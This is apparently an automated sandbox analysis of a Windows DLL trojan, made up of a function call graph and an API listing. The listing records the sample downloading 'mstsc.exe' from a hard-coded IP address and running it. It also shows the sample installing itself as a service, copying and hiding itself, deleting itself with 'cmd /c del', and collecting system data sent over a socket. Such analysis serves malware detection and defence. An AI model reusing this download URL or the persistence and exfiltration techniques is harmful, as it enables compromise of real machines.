44154->44153 44160 10008310 44155->44160 44157 1000562d wsprintfA lstrlenA 44162 100076b0 7 API calls 44157->44162 44161 1000831c 44160->44161 44161->44157 44161->44161 44163 10007744 44162->44163 44164 100077ca 44162->44164 44163->44164 44165 10007773 RegOpenKeyExA 44163->44165 44166 1000774b RegCreateKeyExA 44163->44166 44167 100077ad lstrlenA RegSetValueExA 44163->44167 44169 10007845 FreeLibrary 44164->44169 44170 100049aa 44164->44170 44165->44164 44168 10007790 44165->44168 44166->44164 44166->44165 44167->44164 44168->44164 44168->44167 44169->44170 44170->44125 44172 100093fb 44171->44172 44173 1000940f 44171->44173 44197 1000bf03 66 API calls __getptd_noexit 44172->44197 44175 1000b151 ___set_flsgetvalue 3 API calls 44173->44175 44177 10009415 44175->44177 44176 10009400 44198 1000beb1 11 API calls __close 44176->44198 44179 1000f4c1 __calloc_crt 66 API calls 44177->44179 44181 10009421 44179->44181 44180 10007922 WaitForSingleObject CloseHandle 44180->43797 44182 10009472 44181->44182 44192 1000b30c 44181->44192 44199 100086f6 66 API calls 2 library calls 44182->44199 44186 10009478 44186->44180 44200 1000bf29 66 API calls 2 library calls 44186->44200 44187 1000b1df __CRT_INIT@12 66 API calls 44189 10009437 CreateThread 44187->44189 44189->44180 44191 1000946a GetLastError 44189->44191 44217 10009386 44189->44217 44191->44182 44201 1000b293 GetLastError 44192->44201 44194 1000b314 44195 1000942e 44194->44195 44215 10008648 66 API calls 3 library calls 44194->44215 44195->44187 44197->44176 44198->44180 44199->44186 44200->44180 44202 1000b151 ___set_flsgetvalue 3 API calls 44201->44202 44203 1000b2aa 44202->44203 44204 1000b300 SetLastError 44203->44204 44205 1000f4c1 __calloc_crt 62 API calls 44203->44205 44204->44194 44206 1000b2be 44205->44206 44206->44204 44207 1000b2c6 DecodePointer 44206->44207 44208 1000b2db 44207->44208 44209 1000b2f7 44208->44209 44210 1000b2df 44208->44210 44216 100086f6 66 API calls 2 library calls 44209->44216 44211 1000b1df __CRT_INIT@12 62 API calls 44210->44211 44213 1000b2e7 GetCurrentThreadId 44211->44213 44213->44204 44214 1000b2fd 44214->44204 44216->44214 44218 1000b151 ___set_flsgetvalue 3 API calls 44217->44218 44219 10009391 44218->44219 44232 1000b131 TlsGetValue 44219->44232 44222 100093a0 44281 1000b185 DecodePointer 44222->44281 44223 100093ca 44234 1000b326 44223->44234 44225 100093e5 44270 10009345 44225->44270 44228 100093af 44230 100093c0 GetCurrentThreadId 44228->44230 44231 100093b3 GetLastError ExitThread 44228->44231 44230->44225 44233 1000939c 44232->44233 44233->44222 44233->44223 44235 1000b332 __close 44234->44235 44236 1000b34a 44235->44236 44238 1000b434 __close 44235->44238 44282 100086f6 66 API calls 2 library calls 44235->44282 44237 1000b358 44236->44237 44283 100086f6 66 API calls 2 library calls 44236->44283 44241 1000b366 44237->44241 44284 100086f6 66 API calls 2 library calls 44237->44284 44238->44225 44243 1000b374 44241->44243 44285 100086f6 66 API calls 2 library calls 44241->44285 44245 1000b382 44243->44245 44286 100086f6 66 API calls 2 library calls 44243->44286 44246 1000b390 44245->44246 44287 100086f6 66 API calls 2 library calls 44245->44287 44249 1000b39e 44246->44249 44288 100086f6 66 API calls 2 library calls 44246->44288 44251 1000b3af 44249->44251 44289 100086f6 66 API calls 2 library calls 44249->44289 44253 1000bad1 __lock 66 API calls 44251->44253 44254 1000b3b7 44253->44254 44255 1000b3c3 InterlockedDecrement 44254->44255 44261 1000b3dc 44254->44261 44256 1000b3ce 44255->44256 44255->44261 44256->44261 44290 100086f6 66 API calls 2 library calls 44256->44290 44258 1000b3e9 44260 1000bad1 __lock 66 API calls 44258->44260 44262 1000b3f0 44260->44262 44291 1000b440 LeaveCriticalSection _doexit 44261->44291 44263 1000b421 44262->44263 44292 1000cd63 8 API calls 44262->44292 44294 1000b44c LeaveCriticalSection _doexit 44263->44294 44266 1000b42e 44295 100086f6 66 API calls 2 library calls 44266->44295 44268 1000b405 44268->44263 44293 1000cdfc 66 API calls 4 library calls 44268->44293 44271 10009351 __close 44270->44271 44272 1000b30c __getptd 66 API calls 44271->44272 44273 10009356 44272->44273 44296 10007892 44273->44296 44306 100078a0 SetEvent 44273->44306 44274 10009360 44315 10009326 44274->44315 44276 10009366 44277 1000f312 __XcptFilter 66 API calls 44276->44277 44278 10009377 44277->44278 44281->44228 44282->44236 44283->44237 44284->44241 44285->44243 44286->44245 44287->44246 44288->44249 44289->44251 44290->44261 44291->44258 44292->44268 44293->44263 44294->44266 44295->44238 44297 100078a0 SetEvent 44296->44297 44298 100078c9 44297->44298 44299 100078bf 44297->44299 44322 100037b0 44298->44322 44362 10001ab0 44298->44362 44372 10003896 44298->44372 44396 100070d0 14 API calls 44299->44396 44301 100078c6 44301->44298 44302 100078cc 44302->44274 44307 100078c9 44306->44307 44308 100078bf 44306->44308 44312 10001ab0 96 API calls 44307->44312 44313 100037b0 277 API calls 44307->44313 44314 10003896 277 API calls 44307->44314 44572 100070d0 14 API calls 44308->44572 44310 100078c6 44310->44307 44311 100078cc 44311->44274 44312->44311 44313->44311 44314->44311 44316 1000b293 __getptd_noexit 66 API calls 44315->44316 44317 10009330 44316->44317 44318 10009334 44317->44318 44319 1000933b ExitThread 44317->44319 44573 1000b455 79 API calls __freefls@4 44318->44573 44321 1000933a 44321->44319 44397 100082e0 44322->44397 44325 10003813 GetLastError 44326 10003835 44325->44326 44327 10003820 ReleaseMutex CloseHandle 44325->44327 44328 100035d0 16 API calls 44326->44328 44455 1000860d 66 API calls _doexit 44327->44455 44330 1000383f 44328->44330 44399 10001430 44330->44399 44332 1000384a 44333 1000385a 44332->44333 44349 10003887 _memset _strcspn 44332->44349 44456 100060f0 CreateEventA 44333->44456 44334 10003aba 44465 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44334->44465 44337 10003869 44457 10006120 278 API calls 44337->44457 44338 10003a73 44463 10001630 10 API calls 44338->44463 44340 10003878 44458 100060a0 TerminateThread CloseHandle CloseHandle 44340->44458 44343 10003971 lstrcatA 44343->44349 44344 10003a82 44344->44302 44345 100039c2 GetTickCount 44402 10001c40 7 API calls 44345->44402 44347 100039e4 GetTickCount 44411 10006050 44347->44411 44349->44334 44349->44343 44349->44345 44349->44347 44351 1000394a lstrcatA 44349->44351 44459 10008e38 79 API calls __wcstoi64 44351->44459 44352 10003a36 WaitForSingleObject Sleep 44355 10003a01 44352->44355 44356 10003a2c 44352->44356 44355->44352 44355->44356 44357 10003a5c 44355->44357 44416 10003160 44355->44416 44356->44357 44460 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44356->44460 44464 100060a0 TerminateThread CloseHandle CloseHandle 44356->44464 44461 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44357->44461 44360 10003a64 44462 100060a0 TerminateThread CloseHandle CloseHandle 44360->44462 44370 10001abd _memset __write_nolock 44362->44370 44363 10001c2a 44363->44302 44364 10001ae0 select 44365 10001b8f setsockopt CancelIo InterlockedExchange closesocket 44364->44365 44364->44370 44366 10001c1b SetEvent 44365->44366 44366->44363 44367 10001b83 44367->44302 44368 10001b28 recv 44369 10001bd6 setsockopt CancelIo InterlockedExchange closesocket 44368->44369 44368->44370 44369->44366 44370->44363 44370->44364 44370->44367 44370->44368 44535 10001880 44370->44535 44374 100038a0 _memset _strcspn 44372->44374 44373 10003971 lstrcatA 44373->44374 44374->44373 44375 100039c2 GetTickCount 44374->44375 44377 10003aba 44374->44377 44379 100039e4 GetTickCount 44374->44379 44386 1000394a lstrcatA 44374->44386 44376 10001c40 272 API calls 44375->44376 44376->44374 44571 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44377->44571 44381 10006050 2 API calls 44379->44381 44380 10003a73 44569 10001630 10 API calls 44380->44569 44385 10003a01 44381->44385 44383 10003a82 44383->44302 44384 10003160 153 API calls 44384->44385 44385->44384 44387 10003a36 WaitForSingleObject Sleep 44385->44387 44390 10003a2c 44385->44390 44391 10003a5c 44385->44391 44565 10008e38 79 API calls __wcstoi64 44386->44565 44387->44385 44387->44390 44390->44391 44566 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44390->44566 44570 100060a0 TerminateThread CloseHandle CloseHandle 44390->44570 44567 100014f0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44391->44567 44394 10003a64 44568 100060a0 TerminateThread CloseHandle CloseHandle 44394->44568 44396->44301 44398 100037d2 wsprintfA CreateMutexA 44397->44398 44398->44325 44398->44326 44400 10001462 44399->44400 44401 10001489 WSAStartup CreateEventA 44400->44401 44401->44332 44403 10001cc0 44402->44403 44404 10001ccb gethostbyname 44402->44404 44403->44349 44404->44403 44405 10001cdc htons connect 44404->44405 44405->44403 44406 10001d15 setsockopt 44405->44406 44407 10001d33 WSAIoctl 44406->44407 44408 10001d65 44406->44408 44407->44408 44409 100078e0 266 API calls 44408->44409 44410 10001d7d 44409->44410 44410->44349 44466 10006890 44411->44466 44413 1000605f 44414 10006078 44413->44414 44415 1000606c lstrcpyA 44413->44415 44414->44355 44415->44414 44417 10008310 _memset 44416->44417 44418 1000317f lstrcpyA 44417->44418 44419 10002880 13 API calls 44418->44419 44420 100031d4 lstrlenA 44419->44420 44421 100031f8 lstrlenA 44420->44421 44422 100031ea lstrcpyA 44420->44422 44423 10003210 lstrcpyA 44421->44423 44424 1000320a 44421->44424 44422->44421 44425 10002880 13 API calls 44423->44425 44424->44423 44426 10003247 lstrlenA 44425->44426 44427 10003257 gethostname 44426->44427 44428 10003269 lstrlenA getsockname GetVersionExA LoadLibraryW 44426->44428 44427->44428 44429 100032e2 GetProcAddress 44428->44429 44430 1000331a RegOpenKeyA RegQueryValueExA RegCloseKey 44428->44430 44431 100032f2 44429->44431 44432 10003313 FreeLibrary 44429->44432 44433 10003370 GetSystemInfo wsprintfA 44430->44433 44434 1000336a 44430->44434 44431->44432 44432->44430 44469 100030c0 44433->44469 44434->44433 44436 100033a9 wsprintfA GlobalMemoryStatusEx 44437 10003400 GetDriveTypeA 44436->44437 44438 10003440 44437->44438 44439 1000341b GetDiskFreeSpaceExA 44437->44439 44438->44437 44440 10003446 44438->44440 44439->44438 44483 10002720 7 API calls 44440->44483 44442 1000345a LoadLibraryA GetProcAddress GetProcAddress 44443 10003490 44442->44443 44444 100034a4 _memset 44443->44444 44445 1000349d FreeLibrary 44443->44445 44490 10002930 44444->44490 44445->44444 44448 100034f5 44449 10002880 13 API calls 44448->44449 44450 1000352a lstrlenA 44449->44450 44451 10003540 lstrcpyA 44450->44451 44452 10003552 lstrlenA lstrcpyA 44450->44452 44451->44452 44504 10001720 44452->44504 44454 10003581 44454->44355 44455->44326 44456->44337 44457->44340 44458->44349 44459->44349 44460->44356 44461->44360 44462->44338 44463->44344 44464->44349 44465->44338 44467 10001620 44466->44467 44468 100068a8 CreateEventA 44467->44468 44468->44413 44470 10008730 _malloc 66 API calls 44469->44470 44471 100030d2 44470->44471 44472 100030e6 GetIfTable 44471->44472 44473 100030db 44471->44473 44474 10003116 GetIfTable 44472->44474 44475 100030fe 44472->44475 44473->44436 44476 10003126 44474->44476 44477 100086f6 _free 66 API calls 44475->44477 44478 1000314a 44476->44478 44480 100086f6 _free 66 API calls 44476->44480 44479 10003104 44477->44479 44478->44436 44481 10008730 _malloc 66 API calls 44479->44481 44480->44478 44482 1000310d 44481->44482 44482->44473 44482->44474 44489 10002791 44483->44489 44484 10002795 44484->44442 44485 10002866 FreeLibrary 44486 10002869 44485->44486 44487 10002870 44486->44487 44488 1000286d FreeLibrary 44486->44488 44487->44442 44488->44487 44489->44484 44489->44485 44489->44486 44491 10008310 _memset 44490->44491 44492 10002f87 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress CreateToolhelp32Snapshot 44491->44492 44493 1000308c CloseHandle lstrlenA 44492->44493 44500 10002fd7 44492->44500 44494 100030a1 lstrcpyA 44493->44494 44495 100030ad 44493->44495 44494->44495 44496 100030b1 FreeLibrary 44495->44496 44497 100030b8 GetLastInputInfo GetTickCount 44495->44497 44496->44497 44497->44448 44498 10003000 Process32First 44499 10003012 lstrcmpiA 44498->44499 44498->44500 44501 10003024 Process32Next 44499->44501 44502 10003038 lstrcatA lstrcatA 44499->44502 44500->44493 44500->44498 44503 10003089 44500->44503 44501->44499 44501->44500 44502->44500 44503->44493 44505 100012d0 VirtualFree 44504->44505 44506 10001733 44505->44506 44507 10001805 44506->44507 44508 1000173e 44506->44508 44509 10001350 VirtualAlloc VirtualFree 44507->44509 44510 10008210 77 API calls 44508->44510 44511 10001813 44509->44511 44515 10001747 _memmove 44510->44515 44512 100012d0 VirtualFree 44511->44512 44514 1000181b 44512->44514 44513 10001750 44513->44454 44516 10001350 VirtualAlloc VirtualFree 44514->44516 44515->44513 44517 10001350 VirtualAlloc VirtualFree 44515->44517 44519 100017f6 moneypunct 44516->44519 44518 10001781 44517->44518 44520 10001350 VirtualAlloc VirtualFree 44518->44520 44523 10001550 send Sleep send 44519->44523 44521 1000178f 44520->44521 44522 10001350 VirtualAlloc VirtualFree 44521->44522 44524 1000179d 44522->44524 44525 10001846 44523->44525 44526 10001350 VirtualAlloc VirtualFree 44524->44526 44525->44454 44527 100017b2 44526->44527 44528 10001350 VirtualAlloc VirtualFree 44527->44528 44529 100017bf moneypunct 44528->44529 44530 10008210 77 API calls 44529->44530 44531 100017ce _memmove 44530->44531 44532 100012d0 VirtualFree 44531->44532 44533 100017e9 44532->44533 44534 10001350 VirtualAlloc VirtualFree 44533->44534 44534->44519 44536 10001903 44535->44536 44537 100018bc 44535->44537 44556 10001350 44536->44556 44537->44536 44539 100018d3 44537->44539 44541 10001720 83 API calls 44539->44541 44540 100018f0 44540->44370 44541->44540 44542 10001a58 44564 10008290 RaiseException 44542->44564 44544 1000190d moneypunct 44544->44540 44544->44542 44550 100013a0 VirtualAlloc VirtualFree 44544->44550 44551 10008210 77 API calls 44544->44551 44552 10001a43 44544->44552 44555 10001350 2 API calls 44544->44555 44560 100012d0 44544->44560 44545 10001a6d moneypunct 44546 100012d0 VirtualFree 44545->44546 44547 10001a98 44546->44547 44548 10001720 83 API calls 44547->44548 44549 10001aa3 44548->44549 44549->44370 44550->44544 44551->44544 44563 10008290 RaiseException 44552->44563 44555->44544 44557 1000135e 44556->44557 44558 100010a0 VirtualAlloc VirtualFree 44557->44558 44559 10001374 _memmove 44558->44559 44559->44544 44561 100012e8 44560->44561 44562 100012da VirtualFree 44560->44562 44561->44544 44562->44561 44563->44542 44564->44545 44565->44374 44566->44390 44567->44394 44568->44380 44569->44383 44570->44374 44571->44380 44572->44310 44573->44321 44574->43829 44575 6d5530 44578 6d555f 44575->44578 44576 6d5594 44583 6d4e40 44576->44583 44578->44576 44612 6d1830 46 API calls 2 library calls 44578->44612 44580 6d55d7 44584 6d4e52 44583->44584 44590 6d4e9a 44583->44590 44584->44590 44613 70f2e0 80 API calls 44584->44613 44586 6d4e64 44587 6d4e71 44586->44587 44614 6d4d50 54 API calls shared_ptr 44586->44614 44587->44590 44615 6d1800 46 API calls ~_Mpunct 44587->44615 44590->44580 44591 6d2da0 44590->44591 44592 6d2dae 44591->44592 44593 6d2db9 44591->44593 44624 6d2b80 46 API calls 2 library calls 44592->44624 44595 6d2dca 44593->44595 44625 6d1830 46 API calls 2 library calls 44593->44625 44596 6d2de5 44595->44596 44626 6d1830 46 API calls 2 library calls 44595->44626 44603 6d2dfe 44596->44603 44616 6d2c40 44596->44616 44597 6d2db3 44597->44580 44601 6d2e29 44629 8de880 11 API calls 3 library calls 44601->44629 44602 6d2e09 44627 8deee0 11 API calls 2 library calls 44602->44627 44603->44601 44603->44602 44606 6d2e17 44628 6d29a0 46 API calls shared_ptr 44606->44628 44607 6d2e34 44630 6d29a0 46 API calls shared_ptr 44607->44630 44610 6d2e3f 44610->44580 44611 6d2e22 44611->44580 44613->44586 44614->44587 44615->44590 44617 6d2c50 44616->44617 44618 6d2c58 44617->44618 44622 6d2c63 44617->44622 44631 6d2a20 44618->44631 44620 6d2c90 44620->44603 44621 6d2c5e 44621->44603 44622->44620 44639 6d2ad0 46 API calls 44622->44639 44624->44597 44627->44606 44628->44611 44629->44607 44630->44610 44632 6d2a3b 44631->44632 44640 6f4b20 44632->44640 44633 6d2a49 44634 6d2a54 44633->44634 44646 6d19a0 46 API calls shared_ptr 44633->44646 44647 8de880 11 API calls 3 library calls 44634->44647 44637 6d2a70 44637->44621 44639->44620 44641 6f4b40 44640->44641 44642 6f4b31 44640->44642 44645 6f4b5e _malloc 44641->44645 44649 71f2e0 PeekMessageA PostQuitMessage 44641->44649 44648 71f2e0 PeekMessageA PostQuitMessage 44642->44648 44645->44633 44647->44637 44648->44641 44649->44645 44650 8e0100 44653 8f6c80 44650->44653 44652 8e010a 44654 8f6ca2 44653->44654 44655 8f6cc1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 44653->44655 44654->44655 44656 8f6cae 44654->44656 44657 8f6d23 44655->44657 44656->44652 44657->44656 44658 8e0960 44659 8e0999 44658->44659 44664 8e0a00 44659->44664 44661 8e09be 44675 8e09d2 LeaveCriticalSection __freefls@4 44661->44675 44663 8e09d0 44665 8e0a3a 44664->44665 44674 8e0a1d _memset 44664->44674 44667 8e0a7c _CheckBytes 44665->44667 44665->44674 44692 8e19a0 LeaveCriticalSection HeapValidate __heapchk _CheckBytes __CrtCheckMemory 44665->44692 44667->44674 44676 8e1f50 HeapValidate __CrtIsValidHeapPointer 44667->44676 44669 8e0c8a 44670 8e0d98 44669->44670 44671 8e0d73 44669->44671 44669->44674 44693 8f81b0 15 API calls 3 library calls 44670->44693 44677 8f8310 44671->44677 44674->44661 44675->44663 44676->44669 44678 8f8336 44677->44678 44679 8f8325 44677->44679 44681 8f833c 44678->44681 44686 8f834f 44678->44686 44694 8f80a0 44679->44694 44701 8f8410 HeapFree GetLastError __expand_base 44681->44701 44683 8f8385 44702 8f8060 DecodePointer 44683->44702 44684 8f8369 HeapReAlloc 44684->44686 44686->44683 44686->44684 44687 8f83af 44686->44687 44691 8f83e4 GetLastError 44686->44691 44703 8f8060 DecodePointer 44686->44703 44688 8f83b7 GetLastError 44687->44688 44689 8f832e __expand_base 44687->44689 44688->44689 44689->44674 44691->44689 44692->44667 44693->44674 44695 8f80f6 44694->44695 44698 8f80b3 44694->44698 44715 8f8060 DecodePointer 44695->44715 44700 8f80c8 44698->44700 44704 8f8130 44698->44704 44714 8f8060 DecodePointer 44698->44714 44700->44689 44701->44689 44702->44689 44703->44686 44705 8f813f 44704->44705 44706 8f815b RtlAllocateHeap 44704->44706 44716 8f7c70 31 API calls 2 library calls 44705->44716 44706->44698 44708 8f8144 44717 8f7d10 31 API calls 10 library calls 44708->44717 44711 8f814b 44718 8e5880 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 44711->44718 44714->44698 44715->44700 44716->44708 44717->44711 44719 6f1d70 44720 6f1d7f 44719->44720 44722 6f1d9f 44720->44722 44730 71f2e0 PeekMessageA PostQuitMessage 44720->44730 44723 6f1dd4 44722->44723 44726 6f1db0 44722->44726 44727 6f1d30 44722->44727 44723->44726 44731 6f1700 12 API calls 2 library calls 44723->44731 44732 70f220 44727->44732 44730->44722 44731->44726 44733 70f237 shared_ptr 44732->44733 44734 70f247 44733->44734 44758 71f2e0 PeekMessageA PostQuitMessage 44733->44758 44736 70f25d 44734->44736 44759 6f1e50 RaiseException __CxxThrowException@8 44734->44759 44746 717580 44736->44746 44741 70f26c 44742 6f1d5e 44741->44742 44743 70f29d WideCharToMultiByte 44741->44743 44760 71f2e0 PeekMessageA PostQuitMessage 44741->44760 44742->44723 44743->44742 44745 70f298 44745->44743 44747 7206d0 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 80 API calls 44746->44747 44748 71758a 44747->44748 44751 71759c 44748->44751 44761 71f2e0 PeekMessageA PostQuitMessage 44748->44761 44750 7206d0 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 80 API calls 44752 70f266 44750->44752 44751->44750 44753 6d4b60 FindResourceW 44752->44753 44754 6d4b86 44753->44754 44755 6d4b82 44753->44755 44762 6d4af0 LoadResource LockResource SizeofResource 44754->44762 44755->44741 44757 6d4b8e 44757->44741 44758->44734 44759->44736 44760->44745 44761->44751 44762->44757 44763 6fc540 44764 6fc55c 44763->44764 44767 6fc690 44764->44767 44780 717640 80 API calls allocator 44767->44780 44769 6fc6a0 44770 6fc6af 44769->44770 44781 71faf0 KiUserCallbackDispatcher GetSystemMetrics GetSystemMetrics GetSystemMetrics GetDC 44769->44781 44786 708940 IsWindow GetWindowLongA PeekMessageA PostQuitMessage allocator 44770->44786 44773 6fc6b7 44774 6fc6e7 44773->44774 44787 6f6560 76 API calls Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 44773->44787 44789 6f65b0 74 API calls Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 44774->44789 44777 6fc6c3 44788 706260 124 API calls allocator 44777->44788 44778 6fc580 44780->44769 44782 71fb59 GetDeviceCaps GetDeviceCaps ReleaseDC 44781->44782 44783 71fb48 44781->44783 44782->44770 44790 71f2e0 PeekMessageA PostQuitMessage 44783->44790 44785 71fb54 44785->44782 44786->44773 44787->44777 44788->44774 44789->44778 44790->44785 44791 8f7c30 HeapCreate 44792 8f7c5a 44791->44792

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 10004470-10004504 URLDownloadToFileA Sleep ShellExecuteA GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA GetVersionExA 1 1000450a-1000452c GetVersionExA LoadLibraryW 0->1 2 1000491d-10004999 call 10008310 call 100091c1 call 10002880 lstrlenA 0->2 3 10004566-1000456d 1->3 4 1000452e-1000453c GetProcAddress 1->4 32 100049b7-100049c8 call 100078e0 2->32 33 1000499b-100049af call 100056f0 call 100035d0 2->33 9 100045ac-100045b3 3->9 10 1000456f-10004576 3->10 7 1000453e-10004555 4->7 8 1000455f-10004560 FreeLibrary 4->8 7->8 8->3 13 10004740-10004742 9->13 14 100045b9-100045c0 call 10003ed0 9->14 10->9 12 10004578-1000459d call 100078e0 WaitForSingleObject CloseHandle 10->12 29 100045a3-100045aa Sleep 12->29 18 10004748-100047e9 call 100056f0 call 100035d0 call 10008310 SHGetSpecialFolderPathA call 10008310 call 100091c1 GetFileAttributesA 13->18 19 100049eb-100049f1 13->19 25 100045c2-100045f8 Sleep StartServiceCtrlDispatcherA Sleep StartServiceCtrlDispatcherA 14->25 26 100045fd-1000463d ExpandEnvironmentStringsA wsprintfA 14->26 59 100048ea 18->59 60 100047ef-100048e4 GetModuleFileNameA call 100091c1 DefineDosDeviceA Sleep CopyFileA SetFileAttributesA call 100091c1 ShellExecuteA call 10004310 ExitProcess 18->60 30 1000470d-1000473a call 100078e0 WaitForSingleObject CloseHandle ExitProcess 25->30 31 10004640-10004645 26->31 29->29 31->31 36 10004647-10004658 31->36 44 100049cd-100049dc WaitForSingleObject CloseHandle 32->44 51 100049b4 33->51 41 1000465a 36->41 42 1000465c-10004662 36->42 41->42 46 10004663-10004669 42->46 48 100049e2-100049e9 Sleep 44->48 46->46 50 1000466b-1000467d 46->50 48->48 54 10004680-10004685 50->54 51->32 54->54 56 10004687-1000468f 54->56 58 10004690-10004696 56->58 58->58 61 10004698-10004707 GetModuleFileNameA CopyFileA call 10003b50 call 100056f0 call 100035d0 Sleep 58->61 63 100048f0-1000491b Sleep call 100078e0 WaitForSingleObject CloseHandle 59->63 61->30
                                APIs
                                • URLDownloadToFileA.URLMON(00000000,http://114.132.64.209:9652/mstsc.exe,C:\mstsc.exe,00000000,00000000), ref: 1000448C
                                • Sleep.KERNEL32(000003E8), ref: 1000449C
                                • ShellExecuteA.SHELL32(00000000,open,c:\mstsc.exe,00000000,00000000,00000005), ref: 100044B6
                                • GetInputState.USER32 ref: 100044B8
                                • GetCurrentThreadId.KERNEL32 ref: 100044C4
                                • PostThreadMessageA.USER32(00000000), ref: 100044CB
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 100044DE
                                • GetVersionExA.KERNEL32(?), ref: 100044FB
                                • GetVersionExA.KERNEL32(?), ref: 1000451B
                                • LoadLibraryW.KERNEL32(ntdll.dll), ref: 10004522
                                • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 10004534
                                • FreeLibrary.KERNEL32(00000000), ref: 10004560
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10004596
                                • CloseHandle.KERNEL32(00000000), ref: 1000459D
                                • Sleep.KERNEL32(000F4240), ref: 100045A8
                                • Sleep.KERNEL32(000001F4), ref: 100045DD
                                • StartServiceCtrlDispatcherA.ADVAPI32(Rsymwe miusskwq), ref: 100045E9
                                • Sleep.KERNEL32(000003E8), ref: 100045F0
                                • StartServiceCtrlDispatcherA.ADVAPI32(Rsymwe miusskwq), ref: 100045F6
                                • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 1000460E
                                • wsprintfA.USER32 ref: 1000462E
                                • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 100046B6
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 100046CC
                                • Sleep.KERNEL32(000001F4), ref: 10004707
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000472B
                                • CloseHandle.KERNEL32(00000000), ref: 10004732
                                • ExitProcess.KERNEL32 ref: 1000473A
                                • _memset.LIBCMT ref: 10004776
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000018,00000000), ref: 1000478B
                                • _memset.LIBCMT ref: 100047A6
                                • _sprintf.LIBCMT ref: 100047D1
                                • GetFileAttributesA.KERNEL32(00000000), ref: 100047E0
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100047FD
                                • DefineDosDeviceA.KERNEL32(00000001,?,00000000), ref: 1000485C
                                • Sleep.KERNEL32(00000064), ref: 10004864
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 1000488E
                                • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 1000489D
                                • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 100048DB
                                  • Part of subcall function 10004310: _memset.LIBCMT ref: 10004330
                                  • Part of subcall function 10004310: _memset.LIBCMT ref: 10004348
                                  • Part of subcall function 10004310: _memset.LIBCMT ref: 10004360
                                  • Part of subcall function 10004310: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004375
                                  • Part of subcall function 10004310: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 1000438A
                                  • Part of subcall function 10004310: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043A1
                                  • Part of subcall function 10004310: lstrcatA.KERNEL32(?,/c del ,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043B9
                                  • Part of subcall function 10004310: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043C9
                                  • Part of subcall function 10004310: lstrcatA.KERNEL32(?, > nul,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043D7
                                  • Part of subcall function 10004310: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000440D
                                  • Part of subcall function 10004310: SetPriorityClass.KERNEL32(100048E2,00000040,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004423
                                  • Part of subcall function 10004310: GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000442A
                                  • Part of subcall function 10004310: SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004431
                                  • Part of subcall function 10004310: GetCurrentThread.KERNEL32 ref: 10004435
                                  • Part of subcall function 10004310: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000443C
                                  • Part of subcall function 10004310: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 1000444E
                                • ExitProcess.KERNEL32 ref: 100048E4
                                • _sprintf.LIBCMT ref: 100048BA
                                  • Part of subcall function 100091C1: __flsbuf.LIBCMT ref: 10009237
                                • _sprintf.LIBCMT ref: 10004839
                                  • Part of subcall function 100091C1: __output_l.LIBCMT ref: 1000921C
                                • Sleep.KERNEL32(00000032), ref: 100048F2
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10004912
                                • CloseHandle.KERNEL32(00000000), ref: 10004915
                                • _memset.LIBCMT ref: 1000493C
                                • _sprintf.LIBCMT ref: 1000494F
                                • lstrlenA.KERNEL32(00000000), ref: 10004991
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 100049D5
                                • CloseHandle.KERNEL32(00000000), ref: 100049DC
                                • Sleep.KERNEL32(000F4240), ref: 100049E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
